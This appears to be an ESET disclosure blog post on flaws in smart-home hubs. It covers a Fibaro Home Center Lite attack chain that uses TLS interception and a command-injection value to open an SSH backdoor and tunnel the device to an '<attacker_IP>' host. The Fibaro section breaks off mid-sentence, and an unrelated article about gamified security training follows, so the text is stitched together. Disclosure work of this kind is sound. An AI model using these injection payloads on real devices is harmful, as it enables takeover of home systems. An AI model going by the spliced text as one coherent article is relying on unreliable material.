ESET IoT Research has found numerous serious security vulnerabilities in three different home hubs – Fibaro Home Center Lite, Homematic Central Control Unit (CCU2) and eLAN-RF-003. These devices are used to monitor and control smart homes and other environments in thousands of households and companies across Europe and beyond. Potential consequences of these weaknesses include full access to the central and peripheral devices in these monitored systems, and to the sensitive data they contain, unauthenticated remote code execution, and Man-in-the-Middle (MitM) attacks. While these hubs are predominantly used in home and small office environments, they also open a potential attack vector for enterprises. This trend is even more worrisome as more employees are working from home these days.

We have reported our findings described in this blogpost to the respective manufacturers. Fibaro has proven to be extraordinarily cooperative, fixing most of the reported issues within days. eQ‑3 followed the standard disclosure procedure and patched its devices within the standard 90-day period. Elko has patched some of the reported vulnerabilities of their device within the standard 90-day period. Other issues may have been fixed in newer generations of the devices but remain in the older ones, with the vendor claiming hardware and compatibility limitations.

The issues described in this article have been reported to the vendors – who have then released patches for most of them – in 2018. The publication has been delayed due to our focus on research into other vulnerabilities that were still active. Nonetheless, with the current heightened requirement for IoT security, we are releasing this compilation of older findings to further advise all owners of the affected devices to apply the latest updates to their devices to increase their security and reduce exposure to outside attacks.

Fibaro Home Center (HC) Lite

Figure 1. Fibaro Home Center (HC) Lite tested by ESET IoT Research team

Fibaro Home Center Lite is a home automation controller, designed to control a wide variety of peripheral devices in a smart home. Among other things, the manufacturer’s website promises simple setup and configuration, a user-friendly web interface, and compatibility with a range of sensors, actors, remotes, IP cameras, and popular home assistants Google Home and Amazon Alexa.

However, a thorough inspection of the device (firmware version 4.170) by the ESET IoT Research team uncovered a mixture of serious vulnerabilities that could have opened the door for outside attackers.

One combination of the flaws we found even allowed an attacker to create an SSH backdoor and gain full control over the targeted device.

Other issues we uncovered included:

TLS connections were vulnerable to MitM attacks (due to missing certificate validation), allowing the attackers to: Use command injection Gain root access by brute forcing a very short, hardcoded password stored in the file /etc/shadow in the device’s firmware. Hardcoded password salt (used by the SQLite database, which stores usernames and passwords) were easily accessible via Fibaro’s web interface scripts, allowing the attacker to replace user passwords and create new passwords. Requests to the device’s weather service (API) leaked the exact GPS coordinates of the device, since they were sent as part of unencrypted HTTP communications. Fibaro Home Center Lite vulnerability

As designed, the remote management connection between Fibaro Home Center Lite and its cloud server is secured via a standard SSH tunnel, created in two steps:

Fibaro Home Center Lite sends two separate TLS-encrypted requests asking for the SSH server’s hostname and listening port, as seen in Figure 1. Based on the information returned, Fibaro Home Center Lite creates a secured connection via an SSH tunnel to the specified SSH server.

Figure 2. TLS-encrypted requests sent by Fibaro Home Center Lite, vulnerable to MitM attack.

The full command from the device’s initialization shell script that is responsible for processing the data returned from these requests is as follows:

screen -d -m -S RemoteAccess ssh -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R $PORT_Response:localhost:80 [email protected]$IP_Response

The response values are passed to the command via the $IP_Response and $PORT_Response variables. Normally, this would allow the device to create an SSH tunnel through which it would forward its HTTP port 80 to the specified port on the remote SSH server.

Figure 3. TLS-encrypted requests sent by Fibaro Home Center Lite, vulnerable to MitM attack.

Gaining access to Fibaro Home Center Lite

To successfully infiltrate the process described above, ESET researchers created their own server that would accept the public key of the targeted device, to mimic the original Fibaro server (lb-1.eu.ra.fibaro.com). This MitM server (subsequently referred to as <attacker_IP>) uses port 666 for the attack and is set to accept the public key sent by Fibaro Home Center Lite – which we obtained from previous communication with the device.

Connection between Fibaro Home Center Lite and the MitM server is established due to Fibaro Home Center Lite failing to perform certificate verification on some TLS connections with the server, allowing any attacker to use fake certificates signed by their proxy server.

To make matters worse, intercepted TLS requests – intended to create the SSH tunnel between the device and the legitimate server – are vulnerable to command injection. By using the MitM server, attackers can replace the address of the original server lb-1.eu.ra.fibaro.com with whatever they wish. For example, the attacker can generate a malicious response with a command injection of the form 0n-Jn/usr/sbin/dropbear${IFS}-p${IFS}666, which causes the respective command from the initialization shell script to fail and subsequently to open an SSH backdoor to Fibaro Home Center Lite.

After a while, Fibaro Home Center Lite requests the server’s IP address once again. Again, the request can be intercepted by the attacker and answered with the following: <attacker_IP>n-R 6666:localhost:666.

On Fibaro Home Center Lite, this response is passed to the initialization shell script command, which results in creation of the intended SSH tunnel originally meant for the forwarding

How gamification can boost your cybersecurity training

Security is not a game, but learning about it could be – here’s why adding the fun factor can help employees become more cyber-aware

Since 2017, each April 21st we mark World Creativity and Innovation Day. It’s a day dedicated to celebrating creative and innovative thinking, but it doesn’t mean it has to be limited to the creative industry and arts. Applying that creativity and innovation to every field is essential – especially to ones that may be viewed as highly technical and a bit dull, such as cybersecurity.

Since human errors and mistakes are often to blame for many breaches, improving employee cybersecurity awareness should be at the forefront of most companies’ security training. And not just companies; millennials who grew up with the internet permeating all aspects of life are now raising children who can’t imagine a world without computers or the web. So, millennial parents should probably teach their children how to be safe on the interwebz and who knows, that may even motivate them to consider a career in cybersecurity.

Giving lectures or endless PowerPoint presentations doesn’t cut it anymore for many employees, since more often than not your audience members won’t keep their attention throughout the whole thing. The key isn’t to demonstrate examples of phishing attacks or types of malware, but to have your attention while making the whole exercise creative: that’s where gamification comes in.

The dictionary definition of gamification would be the adding of game principals, game thinking or game logic to a task to encourage participation – long story short, make training a game. By making learning more interactive and fun, you motivate the participants to engage more with the material and to practice. Since they try it out themselves, they can learn faster and commit the material to long-term memory.

One of the simplest examples of gamification when it comes to cybersecurity is phishing attacks. Instead of just demonstrating examples of phishing to your employees, you test them using a game or quiz where they’ll have to catch the phish.

To make the exercise even more rewarding, you can add points … and once employees have accumulated enough points, they can exchange them for prizes. Rewards keep them engaged and motivated to do their best while mastering the skills you want them to acquire. To put it in numbers: 8 in 10 employees feel more motivated when their training is gamified.

To up the stakes, you can also add leaderboards so that the employees are competing against each other. Healthy competition never hurts, and it also adds incentive since everybody wants to perform at least on the same level as their colleagues.

Gamifying training does bear fruit: the employees not only remain motivated and engaged, but their organization sees results as well. “Over the course of this last year, we had a 10% reduction in end user risk. Most organizations, when they get compromised, it happens because an end user has a weak password, gets phished or downloads malware. The amount of education you need to do around these things is incredible. One percent to 2% is a win, but a 10% reduction is remarkable,” George Gerchow, the chief security officer at Sumo Logic, told InfoSecurity Professional Magazine.

Employees are on the frontlines and mistakes are costly; in the event of a major cybersecurity breach or incident, though, it’s usually the executives who have to act and deal with the fallout. They are the ones who need to identify threats and make decisions, especially when time is of the essence. So, they need to train as well. And what better way to train than to experience a cyberattack – a simulated one, that is. You may have heard of the concept of war games; these are used by militaries all over the world to test out their theories and strategies without having to engage in actual hostilities.

A cyberattack simulation operates on the same premise: the company gets to test out its reaction times and defenses without incurring damage of any kind. Based on its results, it can then analyze the areas where its policies and skills were lacking and improve them. First and foremost, it is an educational exercise – but since it mimics real-life scenarios, it is easier to comprehend (simulated) attacks once you experience them than just reading about them. One such game was developed by PricewaterhouseCoopers.

Having a basic understanding of cybersecurity is a must in this day and age, and companies have to continuously train their employees and raise their awareness of the threats they face. Having a creative and innovative approach to training can make a huge difference – not only will it be engaging for employees, but it is more likely they will be more proficient in identifying cyber-threats.

21 Apr 2020 – 11:30AM